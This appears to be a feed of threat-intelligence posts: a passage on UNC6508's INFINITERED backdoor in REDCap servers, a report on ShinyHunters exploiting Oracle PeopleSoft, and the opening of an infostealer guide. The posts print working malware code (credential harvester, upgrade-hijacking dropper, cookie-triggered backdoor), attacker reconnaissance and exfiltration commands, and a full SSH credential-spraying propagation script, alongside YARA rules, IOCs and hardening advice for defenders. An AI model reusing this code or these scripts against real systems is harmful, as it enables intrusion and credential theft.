  • Prevent Cookie Theft: Enforce Device Bound Session Credentials (DBSC) with CAA for highly sensitive accounts on Windows devices to prevent session hijacking.

  • Monitor Audit Logs: Enable Audit logs to analyze, monitor, and alert on changes to your data.

  • Control Data: Define Data Loss Prevention (DLP) rules to block or alert on external sharing of sensitive data.

  • Audit Compliance Rules: Review Admin audit logs and content compliance rules for unauthorized modifications.

  • SIEM Coverage: Consider using Google Security Operations (SecOps) and ensure Workspace logs are included in your Security Information and Event Management (SIEM) pipeline.

  • Password Protection: Use Chrome Enterprise Password Leak Detection to alert when potentially compromised password use is detected.

  • Patch REDCap: Fully updated REDCap installations to the latest software version and ensure older versions are completely removed.

  • Monitor for INFINITERED: Scan REDCap servers for the presence of INFINITERED using the provided YARA rule and IOCs.

Medical Research University Compromise

In September 2023, a REDCap server belonging to a North American medical research institution was compromised. Continuing activity was observed through November 2025. During this time period, UNC6508 carried out the following attack chain.

  1. Exploit the REDCap server.

  2. After three months, deploy the INFINITERED malware.

  3. INFINITERED stealthily records credentials, and persists through upgrades, for more than a year.

  4. Pivot to a domain admin account.

  5. Add the malicious content compliance rule.

  6. Silently β€œBCC-forward” matched emails to a threat actor-controlled account.

Campaign attack flow diagram

Figure 1: Campaign attack flow diagram

Initial Access: REDCap Exploitation and INFINITERED

UNC6508 consistently targets REDCap servers. REDCap is a web-based software platform designed specifically for building and managing online databases and surveys, in compliance with regulations for medical and scientific research. It is a commonly used platform in the North American medical research community.

GTIG was not able to confirm how UNC6508 initially gained access to the REDCap server. By design, REDCap allows administrators to continue running legacy software side-by-side with the current version. UNC6508 was observed probing for these vulnerable legacy versions on several target organizations’ REDCap systems. This highlights not only the increasing importance of rapidly applying security patches, but also promptly removing older software versions to prevent downgrade attacks.

Upon establishing a foothold on the REDCap server, UNC6508 performed internal reconnaissance and credential discovery to obtain database and service account credentials. The threat actor also deployed a web shell named "help.php", which maintained persistence and functioned as an uploader in the REDCap application.

INFINITERED Analysis

Three months after the initial compromise, UNC6508 deployed a custom malware payload tracked as INFINITERED. This malware implements its functionality across three distinct modular components by trojanizing legitimate REDCap system files.

  • Dropper and Upgrade InterceptionΒ 

  • Credential Harvester

  • Backdoor, with command and control (C2)

GTIG discovered multiple organizations across the US and Canada compromised with INFINITERED. All of these organizations were promptly notified of the compromise upon detection and offered our assistance with remediation.

INFINITERED diagram

Figure 2: INFINITERED diagram

Dropper and Upgrade Interception

To maintain persistent remote access, INFINITERED injects its code into new REDCap versions by intercepting the upgrade process. This capability is embedded into the legitimate REDCap upgrade system file. INFINITERED performs this code injection following these steps.

  1. Read the current software version, which includes the INFINITERED code.Β 

  2. Extract the malicious logic using GUID delimiter b49e334d-9c01-463e-9bc5-00a6920fb66e.Β 

  3. Inject backdoor code into the custom hooks configuration file.Β 

  4. Inject credential harvester code into the authentication system file.

  5. Inject the extracted code from step 2 into the upgrade system file.

In Elastic Beanstalk environments, INFINTERED performs additional steps to ensure persistence in cloud deployments.

// b49e334d-9c01-463e-9bc5-00a6920fb66e
...
$file_upgrade = $base_path."Upgrade.php"; 
$file_content_upgrade = $zip->getFromName($file_upgrade); // new upgrade file content
$file_content_upgrade_local = file_get_contents(__FILE__); // Contents of the current file 
...
if ($file_content_upgrade !== false) {
    // Base64 GUID delimiter
    $dummy_marker = base64_decode('YjQ5ZTMzNGQtOWMwMS00NjNlLTliYzUtMDBhNjkyMGZiNjZl');
    $pattern = "/$dummy_marker(.*?)$dummy_marker/s";
    if (preg_match($pattern, $file_content_upgrade_local, $matches)) {
        $extracted_text = $matches[0];
        $search_content = "// If running on AWS Elastic Beanstalk"; 
        $upgrade_decode = "// ".$extracted_text."\r\n\t\t".$search_content;
        $new_content = str_replace($search_content, $upgrade_decode, $file_content_upgrade);
        $zip->deleteName($file_upgrade);
        $zip->addFromString($file_upgrade, $new_content);
    }
}
$zip->close();
...
// b49e334d-9c01-463e-9bc5-00a6920fb66e

Code Snippet 1: Intercept upgrades and inject INFINITERED code

Credential Harvester

INFINITERED injects a credential harvester into the authentication system file to compromise user accounts. This component of the malware captures usernames and passwords submitted via POST requests during the login process. The credentials are encrypted using the environment’s default encryption routine and hidden inside a local REDCap sessions database table with the string β€œxc32038474a” prefixed to the Session ID.

$currentUTC = gmdate('Y-m-d H:i:s');
$str = encrypt($currentUTC . '[::]' . $_POST['username'] . '[::]' . $_POST['password']);
include dirname(__FILE__, 3) . DIRECTORY_SEPARATOR . 'redcap_connect.php';
$expiration_timestamp = strtotime("+60 days", strtotime($currentUTC));
$session_id = 'xc32038474a'.substr(bin2hex($currentUTC), -20);
$session_sql = "INSERT INTO [REDACTED] ([REDACTED],[REDACTED],[REDACTED]) VALUES ('$session_id', '$str', FROM_UNIXTIME($expiration_timestamp))";
@$rc_connection->query($session_sql);

Code Snippet 2: Hide credentials in a legitimate database table

Backdoor

INFINITERED also has backdoor functionality it establishes in the custom hooks system file inside the update package, specifically within a function that executes on every REDCap page load. This global hook ensures the backdoor runs on every page load. INFINITERED looks for a specific HTTP Cookie parameter named "REDCAP-TOKEN" and a cookie value starting with a specific plaintext string. If these conditions are present, the malware strips the prefix and decrypts the remaining payload with the environment's default decryption routine.

$cookieValue = $_COOKIE['REDCAP-TOKEN'];
if ($cookieValue) {
    $magic_flag = '[REDACTED]'; // Cookie prefix
    ...
    // Decrypt message if cookie prefix is found
    $key = '[REDACTED]';
    $req_data = substr($cookieValue, strlen($magic_flag));
    $req_data = decrypt($req_data, $key);

Code Snippet 3: Decrypting commands to INFINITERED

If the decrypted payload is empty, the malware acts as a beacon, returning system details such as the OS, PHP version, working directory, and database credentials including the hostname, username, password, and salt. When non-empty, the malware will parse the payload for command tags, which the threat actor can use to execute shell commands, run raw SQL queries, and transfer files.

Supported Commands

INFINITERED is capable of executing the following commands.

Command Tag

Description

00

Executes arbitrary system commands using shell_exec.

02

Uploads a file to the server. The payload contains the destination path and file content.

03

Retrieves stolen credentials stored in the legitimate database table.

04

Deletes the stolen credential records from the legitimate database table.

05

Executes arbitrary SQL queries against the database and returns the results.

ej671a16i7fd8202nu6ltfg5p6x7u

Downloads an arbitrary file from the server. The payload following this tag specifies the full filesystem path of the target file.

Empty Payload

Beacons system information, database credentials, and configuration details.

Table 1: Supported commands for INFINITERED

Domain Content Compliance Rule Abuse

More than a year after the initial compromise, UNC6508 used overlapping credentials, harvested from REDCap, to access an administrator account. This underscores the challenge and importance of securing systems holistically. Defenders should enable 2-Step Verification (2SV) and ensure unique credentials are used across different security domains to mitigate credential replay attacks.

UNC6508 then leveraged content compliance rules, a legitimate feature present in many cloud-based enterprise productivity suites, to exfiltrate specific email communications. Administrators can create these rules to manage email messages that contain content matching predefined sets of words, phrases, text patterns, or numerical patterns. By default, compliance rules apply to all users in an organizational unit. The use of compliance rules for data exfiltration is a novel technique not previously observed with PRC-nexus threat actors.

Specifically, UNC6508 created a compliance rule named "Patroit" [sic] that used regular expressions to match on keyword and email address patterns in sent or received emails. Matches were silently BCC-forwarded to a threat actor-controlled Gmail address, BebitaBarefoot774[@]gmail[.]com, providing a covert and continuous stream of exfiltrated data. Upon discovery, GTIG disabled the Gmail account to prevent further data exfiltration.

Targeted intelligence collection categories

Figure 3: Targeted intelligence collection categories

The patterns used in the β€œPatroit” compliance rule suggest strategic intelligence collection targeting geo-strategic policy, military strategy, advanced technology, and medical research. The patterns also include professional email addresses and phone numbers for members of organizations in these spaces. Several of the terms applied have spelling errors, suggesting the list was manually maintained.Β 

This ambitious scope of intelligence collection from UNC6508 may suggest a broader range of targets beyond the identified victims in the medical research community. GTIG assesses these collection priorities are aligned with the strategic interests of the People's Republic of China.Β 

While most of the terms relate to defense and technology, the terms including medical research facilities, and the specific pathogen β€œChikungunya,” stand out from the others. Chikungunya is a viral disease transmitted to humans from mosquitos and was responsible for an outbreak in China's Guangdong province beginning in July 2025.

Operations Security (OpSec)

GTIG observed UNC6508 use sophisticated and meticulous OpSec techniques to conceal their activities from defenders.

UNC6508 operations security techniques

Figure 4: UNC6508 operations security techniques

UNC6508 relied heavily on Obfuscation (OBF) networks. This strategy, now frequently employed by PRC-nexus actors, involves routing traffic from offensive operations through a mix of compromised routers, residential proxies, Virtual Private Servers (VPS), and other devices.Β Β 

This operation used exclusively US-based OBF network IP addresses to access both the "BebitaBarefoot774[@]gmail[.]com" account and when replaying legitimate credentials to access the compromised enterprise administrator account. Additional OpSec techniques were also used, such as obtaining the threat actor-controlled Gmail account through a mass creation service and dedicating it exclusively to email data exfiltration.

By maintaining a high level of OpSec, UNC6508 significantly complicates the efforts of defenders to identify malicious patterns, establish accurate attribution, and map the threat actor’s infrastructure.

Attribution

GTIG attributes this activity to UNC6508 with high confidence. This assessment is based on infrastructure overlaps between campaigns, the consistent use of the INFINITERED backdoor on REDCap servers, and the specific targeting of medical research and defense sectors. We assess UNC6508 is an espionage motivated threat cluster, with priorities that align with historic PRC state-sponsored espionage trends and intelligence collection requirements.

Indicators of Compromise (IOCs)

To assist the wider community, we have also included a list of indicators in a GTI Collection for registered users.

Network Indicators

Indicator

Type

Context

BebitaBarefoot774@gmail.com

Email

Email exfiltration account

23.169.65.49

IP

Source of admin login (Compromised ASUS router)

File Indicators

Description

SHA256

Persistence (help.php)

ba6b73b0ca0dc7f86b3b397893ac32d729fd53f9df20643288f141f29d020af7

Credential HarvesterΒ 

db65c1b9f9e4cb4d729f45ad4b6fcf3e277caf9eb4c875425dec93fd883f9136

Credential HarvesterΒ 

c1ac43d23f89d41eb4ff131678ab562ab2cfed9aa334b13767ef141d303b0e5b

BackdoorΒ 

8f0158855a656b629ca76ebca565f18bc25563ded34b65d6771632c20edb68ec

BackdoorΒ 

51a57bfc9ed3eb6451c1c289607814d59e1698c666fb97ac5f694c398f23d045

DropperΒ 

4efbef69eb3b09bacff892d6a55778d07c418e7f15eba3cf1245e8cdfd8dda0b

DropperΒ 

58bb25777e0aa86bcd2125101e0bca4e8732b03d91bd8d2f205b446a2a8d5c86

Host Indicators

Indicator

Description

b49e334d-9c01-463e-9bc5-00a6920fb66e

INFINITERED current software version GUID delimiter

xc32038474a

INFINITERED Redcap database session ID prefix

MITRE ATT&CK Mapping

Tactic

Technique ID

Technique Name

Context/Activity

Initial Access

T1190

Exploit Public-Facing Application

Exploitation of REDCap survey management servers.

Persistence

T1505.003

Server Software Component: Web Shell

Deployment of INFINITERED and uploaders.

Β 

T1554

Compromise Client Software Binary

Modification of REDCap to intercept updates.

Defense Evasion

T1027

Obfuscated Files or Information

Use of Base64 encoding for malicious payloads within PHP files.

Β 

T1090.003

Proxy: Multi-hop Proxy

Routing traffic through compromised IoT devices (OBF networks).

Β 

T1562.001

Impair Defenses: Disable or Modify Tools

Creating "silent" BCC rules to avoid user detection.

Β 

T1689

Downgrade Attack

Exploiting vulnerable legacy versions of REDCap.

Credential Access

T1555

Credentials from Password Stores

Accessing local configuration files.Β 

Β 

T1056.003

Input Capture: Web Portal Capture

INFINITERED harvesting plaintext credentials from POST login requests.

Collection

T1114.003

Email Collection: Email Forwarding Rule

Use of content compliance rules ("Patroit") for automated exfiltration.

Β 

T1213

Data from Information Repositories

Searching storage and email for strategic keywords.

Command and Control

T1071.001

Application Layer Protocol: Web Protocols

C2 communication via HTTP Cookie parameters (REDCAP-TOKEN).

Exfiltration

T1567

Exfiltration Over Web Service

Silently forwarding sensitive data to actor-controlled Gmail addresses.

Β 

T1071.001

Application Layer Protocol: Web Protocols

HTTP response to C2 commands

Detections

YARA Rules

rule G_Backdoor_INFINITERED_1 {
	meta:
		author = "Google Threat Intelligence Group (GTIG)"
	strings:
		$magic_flag = "ej671a16i7fd8202nu6ltfg5p6x7u"
		$magic_flag_base64 = "ej671a16i7fd8202nu6ltfg5p6x7u" base64
		$marker = "b49e334d-9c01-463e-9bc5-00a6920fb66e"
		$marker_base64 = "YjQ5ZTMzNGQtOWMwMS00NjNlLTliYzUtMDBhNjkyMGZiNjZl"
		$s1 = "substr($cookieValue, strlen($magic_flag));"
		$s2 = "getcwd(), php_uname(), phpversion(), $_SERVER['SERVER_SOFTWARE']"
		$s3 = "'data' => encrypt($data, $key)"
		$s4 = "$data = shell_exec($command);"
		$s5 = "move_uploaded_file($tmpPath, $fileName)"
		$s6 = "$data = implode('|', $fields)"
		$b_s1 = "substr($cookieValue, strlen($magic_flag));" base64
		$b_s2 = "getcwd(), php_uname(), phpversion(), $_SERVER['SERVER_SOFTWARE']" base64
		$b_s3 = "'data' => encrypt($data, $key)" base64
		$b_s4 = "$data = shell_exec($command);" base64
		$b_s5 = "move_uploaded_file($tmpPath, $fileName)" base64
		$b_s6 = "$data = implode('|', $fields)" base64
		$t1 = "(isset($_POST['username']) && $_POST['password'])"
		$t2 = "INSERT INTO redcap_sessions (session_id, session_data, session_expiration) VALUES ('$session_id', '$str', FROM_UNIXTIME($expiration_timestamp))"
		$t3 = "encrypt($currentUTC . '[::]' . $_POST['username'] . '[::]' . $_POST['password']);"
		$t4 = "redcap_connect.php"
		$b_t1 = "(isset($_POST['username']) && $_POST['password'])" base64
		$b_t2 = "INSERT INTO redcap_sessions (session_id, session_data, session_expiration) VALUES ('$session_id', '$str', FROM_UNIXTIME($expiration_timestamp))" base64
		$b_t3 = "encrypt($currentUTC . '[::]' . $_POST['username'] . '[::]' . $_POST['password']);" base64
		$b_t4 = "redcap_connect.php" base64
		$u1 = "$zip->open($filename) === TRUE)"
		$u2 = "$hooks_encode ="
		$u3 = "$auth_encode ="
		$u4 = "$file_content_hooks = $zip->getFromName($file_hooks);"
		$u5 = "$file_content_auth = $zip->getFromName($file_auth);"
		$u6 = "$file_content_upgrade = $zip->getFromName($file_upgrade);"
		$u7 = "str_replace($search_content, $hooks_decode, $file_content_hooks);"
		$u8 = "str_replace($search_content, $upgrade_decode, $file_content_upgrade);"
		$u9 = "str_replace($search_content, $auth_decode, $file_content_auth);"
		$b_u1 = "$zip->open($filename) === TRUE)" base64
		$b_u2 = "$hooks_encode =" base64
		$b_u3 = "$auth_encode =" base64
		$b_u4 = "$file_content_hooks = $zip->getFromName($file_hooks);" base64
		$b_u5 = "$file_content_auth = $zip->getFromName($file_auth);" base64
		$b_u6 = "$file_content_upgrade = $zip->getFromName($file_upgrade);" base64
		$b_u7 = "str_replace($search_content, $hooks_decode, $file_content_hooks);" base64
		$b_u8 = "str_replace($search_content, $upgrade_decode, $file_content_upgrade);" base64
		$b_u9 = "str_replace($search_content, $auth_decode, $file_content_auth);" base64
		$filemarker = "<?php"
	condition:
		filesize < 1MB and $filemarker in (0 .. 128) and (((any of ($magic*) or any of ($marker*)) and (any of ($s*) or any of ($t*) or any of ($u*))) or 4 of ($s*) or 4 of ($b_s*) or all of ($t*) or all of ($b_t*) or 6 of ($u*) or 6 of ($b_u*))
}

ShinyHunters Targets Education Sector with Oracle PeopleSoft Exploit

11 June 2026 at 16:00

Introduction

Mandiant and Google Threat Intelligence Group (GTIG) have identified an active compromise and extortion campaign attributed to UNC6240 (ShinyHunters) targeting Oracle PeopleSoft application infrastructure. The activity was observed between May 27, 2026, and June 9, 2026 and is consistent with the exploitation of CVE-2026-35273, a critical remote code execution vulnerability (CVSS 9.8) in the Environment Management component. The exploitation of this vulnerability directly aligns with the observed targeting of Environment Management Hub (PSEMHUB) endpoints. Because this activity predates Oracle's June 10, 2026 advisory, the vulnerability was exploited as a zero-day.

Upon becoming aware of active scanning and exploitation, we initiated notifications to over 100 global organizations whose IP addresses correlated with potentially vulnerable endpoints. Most of these organizations were based in the United States, and 68 percent operated within the higher education sector. Subsequently, public reports by @nahamike01 on X highlighted open attacker directories on the staging servers, allowing GTIG to perform a detailed triage of the threat actor's operations.Β 

The attacker staging environments hosted customized MeshCentral agents masquerading as legitimate cloud endpoints, which they used to run administrative command queries and deploy a custom lateral movement and defacement script, [victim_abbreviation]_fanout.sh. This campaign directly correlates with subsequent data leaks of stolen organization data published on the ShinyHunters Data Leak Site (DLS) on June 9, 2026.Β 

We recommend that organizations running Oracle PeopleSoft take the following immediate actions to best defend themselves. Additional remediation and hardening guidance is included later in this post.

aside_block
<ListValue: [StructValue([('title', 'Remediation and Hardening Quick Guide'), ('body', <wagtail.rich_text.RichText object at 0x7f65cc249e20>), ('btn_text', ''), ('href', ''), ('image', None)])]>

Threat Detail & Campaign Overview

On June 9 2026, public threat reports highlighted open attacker directories. GTIG triaged five sequential IP addresses: 142.11.200.186, 142.11.200.187, 142.11.200.188, 142.11.200.189, and 142.11.200.190. These systems were hosting Python SimpleHTTP servers on port 8888, exposing directory contents that included staging materials, customized agents, and attacker command histories.

The staging infrastructure hosted pre-configured Windows MeshCentral agent binaries disguised as Microsoft Azure services, specifically named meshagent32-azure-ops.exe, meshagent64-azure-ops.exe, and meshagent64-v2.exe. MeshCentral is an open-source remote management server; its agent is software that runs on remote devices to allow for remote management across various operating systems, including Windows, Linux, macOS, and FreeBSD. Static analysis indicates these agents were hardcoded to establish communication with the command and control (C2) server wss://azurenetfiles.net:443/agent.ashx. The domain azurenetfiles.net was chosen to mimic legitimate Microsoft Azure NetApp Files endpoints, a common masquerading tactic. An unconfigured Linux meshagent binary was also staged, suggesting that the threat actors passed parameters dynamically via the command line during deployment.

Global Notification Response Campaign

Prior to the discovery of the open staging directories, we began an effort to alert over 100 exposed organizations to assist in restricting access to vulnerable endpoints. These organizations are significantly concentrated in the Higher Education sector; 68 percent are academic institutions, including universities and colleges worldwide.

While several organizations successfully blocked the activity or remediated the vulnerabilities, others experienced compromise, resulting in stolen data being published on the ShinyHunters DLS.

Technical Analysis & Command History

The exposed .bash_history file, which was identical across all five staging hosts, outlines the server configuration and administrative actions. The technical narrative begins with the configuration of the staging environment. On May 27, 2026, at 22:14 UTC, the attackers installed the MeshCentral remote management server (version 1.1.59) to establish their C2 staging environment. Shortly after, at 22:25 UTC, they installed the acme-client npm package to automate the provisioning of Let's Encrypt SSL certificates for the masquerading domain "azurenetfiles.net".Β  The attackers interacted with compromised systems using the MeshCentral command-line interface utility meshctrl.js.

The command history shows the threat actors performing targeted reconnaissance within compromised internal networks. They mapped Oracle PeopleSoft configurations by inspecting mount points, checking the process scheduler configuration file psappsrv.cfg, and reading WebLogic server XML configurations (config.xml). The session log ends with the attackers establishing an outbound SSH connection from their staging system to 176.120.22.24, which hosts the public clearnet mirror of the ShinyHunters DLS.

An analysis of the exposed command history reveals the key administrative and malicious operations performed by the threat actors on the staging servers (timestamps were not available in every case):

1. Staging Infrastructure Setup:

  1. May 27, 2026, 22:14 UTC: Installed MeshCentral (v1.1.59) and 22:25 UTC: Installed "acme-client" to establish the C2 staging environment and automate SSL certificate provisioning for azurenetfiles.net.

  2. Staged the compiled Windows agent binaries (meshagent32-azure-ops.exe, etc.) designed to communicate back to the C2 address: wss://azurenetfiles.net:443/agent.ashx.

  3. May 29, 2026, 18:46 UTC: The attackers checked for the availability of the "authenticode" tool on the staging system using the command npm list global authenticode. This command would return any npm package with a name starting in 'authenticode', such as authenticode-sign, used for signing binaries, or authenticode, used for examining metadata on a file.

2. Targeted Internal Reconnaissance:

  • Leveraged the MeshCentral CLI utility meshctrl.js to execute administrative command queries on compromised remote endpoints: hostname; id.

  • Mapped Oracle PeopleSoft system configurations by inspecting the process scheduler configuration file (psappsrv.cfg) to extract machine names and IP addresses:

grep -hE '\''^[[:space:]]*Address=|^[[:space:]]*HostName='\'' /u01/app/psoft/ps_config_homes/csprd/appserv/prcs/psappsrv.cfg 2>/dev/null | head -80
  • Audited network configurations and active mounts on compromised hosts: mount | grep -E "psoft|ps_config|nfs".

  • Mapped internal subnet hosts by querying local hosts tables: cat /etc/hosts | grep -E "[redacted_victim_string]".

  • Inspected WebLogic XML configurations (config.xml) to map internal application servers.

3. Lateral Movement & Script Propagation:

  • Wrote the lateral propagation script [victim_abbreviation]_fanout.sh via a heredoc to /tmp on the staging host.

  • Triggered the execution of the propagation script on compromised hosts using the MeshCentral command execution feature:

node meshctrl.js RunCommand --loginuser admin --loginpass '[password]' --id '[agent_id]' --run 'bash /tmp/[victim_abbreviation]_fanout.sh'
  • Verified propagation success by running remote checks for the defacement marker file README-IF-YOU-SEE-THIS-YOUVE-BEEN-HACKED.TXT.

4. Exfiltration & DLS Connection:

  • Compressed exfiltrated directories containing stolen data using zstd:

pv -s "$(du -sb exfil | awk '{print $1}')" | zstd -3 -T0 -o exfil.tar.zst
  • Concluded operations by establishing an outbound SSH connection from the staging host to 176.120.22.24, the IP address hosting the public mirror of the ShinyHunters Data Leak Site.
ShinyHunters DLS Post showing Peoplesoft victim added June 9, 2026

Figure 1: ShinyHunters DLS Post showing Peoplesoft victim added June 9, 2026

Propagation Script & Lateral Movement

As observed in the .bash_history log, the threat actors wrote a propagation script named [victim_abbreviation]_fanout.sh directly to the /tmp directory of the compromised system. This script automates SSH credential spraying against internal hosts by parsing hostnames from the local /etc/hosts file matching a specific naming pattern. The script attempts authentication using a hardcoded list of common administrative and application-specific usernames and passwords.

Upon establishing a successful SSH session, the script copies a defacement and extortion marker file named README-IF-YOU-SEE-THIS-YOUVE-BEEN-HACKED.TXT into the WebLogic and Process Scheduler directories. This staging and deployment activity directly correlates with the publication of stolen archives on the ShinyHunters DLS on June 9, 2026.

The redacted contents of the propagation script [victim_abbreviation]_fanout.sh are as follows:

set +e
SRC="/u01/app/psoft/ps_config_homes/csprd/webserv/CSPRD02/README-IF-YOU-SEE-THIS-YOUVE-BEEN-HACKED.TXT"
NAME="README-IF-YOU-SEE-THIS-YOUVE-BEEN-HACKED.TXT"
BASE="/u01/app/psoft/ps_config_homes/csprd"
export PATH=/usr/bin:/bin
# hosts from /etc/hosts β€” internal PS nodes only
HOSTS=$(grep -E '[redacted_victim_host_pattern]|csprd[0-9]' /etc/hosts | awk '{print $2}' | grep -v '^#' | sort -u)
echo "HOSTS=$(echo $HOSTS | wc -w)"
PWDS="[redacted_passwords]"
USERS="[redacted_usernames]"
OK=0; FAIL=0; SKIP=0
for h in $HOSTS; do
  echo "=== $h ==="
  copied=0
  for u in $USERS; do
    for p in $PWDS; do
      sshpass -p "$p" ssh -o StrictHostKeyChecking=no -o ConnectTimeout=6 -o BatchMode=no $u@$h "hostname" >/dev/null 2>&1 && {
        for dest in $BASE/webserv/CSPRD $BASE/webserv/CSPRD02 $BASE/appserv/prcs; do
          sshpass -p "$p" ssh -o StrictHostKeyChecking=no $u@$h "test -d $dest && mkdir -p $dest && cat > $dest/$NAME" < "$SRC" 2>/dev/null && echo "  OK $dest ($u)" && OK=$((OK+1)) && copied=1
        done
        break 2
      }
    done
  done
  if [ $copied -eq 0 ]; then
    # try key-based
    ssh -o StrictHostKeyChecking=no -o ConnectTimeout=6 -o BatchMode=yes $USER@$h "hostname" >/dev/null 2>&1 && copied=1 || true
    if [ $copied -eq 0 ]; then echo "  FAIL ssh"; FAIL=$((FAIL+1)); fi
  fi
done
# local paths on this host
for dest in $BASE/webserv/CSPRD $BASE/webserv/CSPRD02 $BASE/appserv/prcs; do
  if [ -d "$dest" ]; then cp -f "$SRC" "$dest/$NAME" && chmod 644 "$dest/$NAME" && echo "LOCAL OK $dest"; fi
done
echo SUMMARY ok=$OK fail=$FAIL
find $BASE -name "$NAME" -type f 2>/dev/null

Remediation and Hardening

To defend against this campaign, we recommend that organizations running Oracle PeopleSoft immediately implement the following security measures:

Network Isolation & WAF Rules

  • Endpoint Access Restrictions: If you cannot disable the EMHub Service, immediately block external network access to the sensitive endpoints /PSEMHUB/* (specifically /PSEMHUB/hub) and /PSIGW/HttpListeningConnector at the network perimeter or firewall level. Relying solely on Web Application Firewall (WAF) body-inspection rules is insufficient, as these controls can be bypassed.

  • Non-Breaking Action: Restricting these endpoints is considered non-breaking for standard end-user operations. The Environment Management Hub (EMHub) and the Integration Broker Listening Connector are administrative or system-to-system components and are not required for the core user-facing PeopleSoft Internet Architecture (PIA) browser sessions.

Log & Endpoint Monitoring

  • Access Log Analysis: Audit the PIA WebLogic access logs for HTTP POST requests directed at /PSEMHUB/hub and /PSIGW/HttpListeningConnector originating from external or untrusted source IP addresses.

  • SSRF Detection: Analyze requests to /PSIGW/HttpListeningConnector for loopback IP addresses (such as 127.0.0.1, localhost, or ::1) or internal IP ranges passed within request headers or parameters. This is a common method for attackers to perform Server-Side Request Forgery (SSRF) to bypass access controls.

Network Telemetry

  • Outbound Port 445 Monitoring: Monitor outbound firewall logs and NetFlow data for outbound SMB traffic (TCP port 445) originating from PeopleSoft hosts to untrusted, external internet destinations. The exploit chain may coerce the system into making outbound connections in an attempt to capture Windows machine-account NetNTLM hashes.

Host-Level Auditing & Filesystem Checks

Conduct a thorough forensic audit of the web-tier filesystem on PeopleSoft hosts for indicators of compromise:

  • Webshell Detection: Scan the WebLogic web application directory <PS_CFG_HOME>/webserv/<domain>/applications/peoplesoft/PSEMHUB.war/ for any unexpected *.jsp files that are not part of the shipped product.

  • Unauthorized Staging: Inspect the staging directory .../PSEMHUB.war/envmetadata/transactions/ for unauthorized folders, files, or binary drops.

  • Unexpected Directories: Look for unexpected directories named logs, persistantstorage, or scratchpad under the PSEMHUB directories.

  • XMLDecoder Persistence: Check <docroot>/envmetadata/data/environment/ for recently created or modified .xml files, which may be leveraged by threat actors to execute remote code via XMLDecoder upon application restart.

In alignment with Oracle’s security advisory, we consider the implementation of these mitigations to be a high-priority risk reduction measure and strongly recommend immediate action to address the identified exposure. As this vulnerability is remotely exploitable without authentication and may result in remote code execution, organizations must remain on actively supported versions and apply all Critical Patch Updates, Critical Security Patch Updates, and Security Alerts without delay. Review the fullΒ Oracle Security Alert Advisory - CVE-2026-35273 for complete details.

Indicators of Compromise (IOCs)

To assist the wider community in hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) in a GTI collection for registered users.

Staging & C2 Network Indicators

  • 142.11.200.186

  • 142.11.200.187

  • 142.11.200.188

  • 142.11.200.189

  • 142.11.200.190

  • azurenetfiles.net

Staging Payloads & Attacker Files

File Path / Name

Indicator Type

Description

Value / Hash (SHA-256)

.bash_history

File Hash

Attacker command history

2ab684d93c1553fad87041b4dea97188a97e78589deee2a7bacff905564f3a35

meshagent64-azure-ops.exe

File Hash

Pre-configured Windows agent

f02a924c9ff92a8780ce812511341182c6b509d45bc59f3f7b522e37225d24fc

meshagent64-v2.exe

File Hash

Pre-configured Windows agent

d83fdb9e53c5ff03c4cb0451ea1bebd79b53f29eadc1e2fa394c7af13a86ce2f

meshagent32-azure-ops.exe

File Hash

Pre-configured Windows agent

c7e9332731b06644fc73e0046a2a89eaa59b09f54250e9bd622467187351711f

meshagent

File Hash

Unconfigured Linux agent

68257a6f9ff196179ec03624e849927f26599eb180a7c82e14ef5bc4e93bc309

README-IF-YOU-SEE-THIS-YOUVE-BEEN-HACKED.TXT

Filename

Defacement / extortion marker

N/A

[victim_abbreviation]_fanout.sh

Filename

Propagation script

N/A

Google Security Operations (SecOps)

SecOps customers will have access to the following pending-deployment rules. Once fully deployed, these rules will be available under the Mandiant Frontline Threats rule pack:

  • Oracle PeopleSoft Configuration Inspection

  • Oracle PeopleSoft Suspicious JSP File Write to PSEMHUB

  • Sshpass Interactive File Deployment

  • Data Archiving or Compression via Zstd Utility

  • MeshCentral Command Execution via Meshctrl

Identity Is the New Attack Surface: How Infostealers Are Reshaping Enterprise Risk

Blogs

Blog

Identity Is the New Attack Surface: How Infostealers Are Reshaping Enterprise Risk

Our new guide explores how infostealers are fueling modern identity-based attacks and how organizations can build a proactive defense before stolen access is weaponized.

SHARE THIS:
Default Author Image
June 10, 2026

The New Reality of Identity-Based Threats

A publicly exposed database surfaced in early 2026 containing more than 149 million stolen login credentials. The records were not tied to a single breach or organization. Instead, they had been quietly collected over time from devices infected with information-stealing malware, with each record containing usernames, passwords, session data, and the context needed to use them.

Unlike traditional breach dumps, this data was structured, searchable, and immediately actionable. Credentials were mapped to specific services, session artifacts reflected active logins, and much of the information was recent enough to enable direct access without triggering traditional security controls.

This incident reflects a broader shift in the threat landscape.

More than 11.1 million devices were infected with infostealers last year, fueling a supply of over 3.3 billion stolen credentials, session cookies, cloud tokens, and other forms of identity data now circulating across illicit markets.

11.1 million infected hosts and devices
3.3 billion stolen credentials
Top 5 most prolific infostealers in 2025 (by infected hosts or devices):
Lumma
Acreed
Rhadamanthys
Vidar
StealC
Top 6 countries affected by information-stealing malware, 2025:
India
Brazil
Indonesia
Vietnam
Phillipines
United States

For security teams, the challenge is no longer simply detecting a breach after it occurs. It is understanding when access may already exist β€” where compromised credentials are circulating, how they are being used, and how quickly they can be weaponized.

That’s why Flashpoint created Identity Is the New Attack Surface: A Guide to Infostealers and Proactive Defense.

Drawing on Flashpoint’s Primary Source Collection (PSC) and analyst-driven intelligence, this guide helps IT, Threat Intelligence, Fraud, and HUNT teams understand how infostealers operate, how stolen identity data fuels real-world attacks, and how organizations can move from reactive response to proactive defense.

The guide explores:

  • How today’s most active infostealers power modern attack chains
  • How threat actors weaponize stolen credentials, cookies, and session data
  • How organizations can operationalize infostealer intelligence for proactive defense
  • How to evaluate infostealer intelligence providers and detection capabilities

Why Identity Has Become the Preferred Attack Surface

For years, security teams focused on vulnerabilities, malware delivery, and network intrusion as the primary paths to compromise. Increasingly, however, threat actors are taking a different

Modern infostealers such as Lumma, StealC, Vidar, Acreed, and Rhadamanthys provide attackers with something more valuable than initial access: usable identity. These malware families collect credentials, browser artifacts, session cookies, application data, and host metadata that help threat actors understand how a victim authenticates and what systems they can access.

A single infected device can expose credentials, browser artifacts, session cookies, application data, host metadata, and access to enterprise SaaS platforms. Together, these artifacts create a detailed profile of how a user authenticates, what systems they access, and how those systems trust that identity.

This is what makes infostealer data so valuable.

β€œFor years, organizations have invested heavily in detecting malware, blocking exploits, and hardening infrastructure. Meanwhile, attackers have increasingly shifted to a simpler strategy: logging in with valid identities.

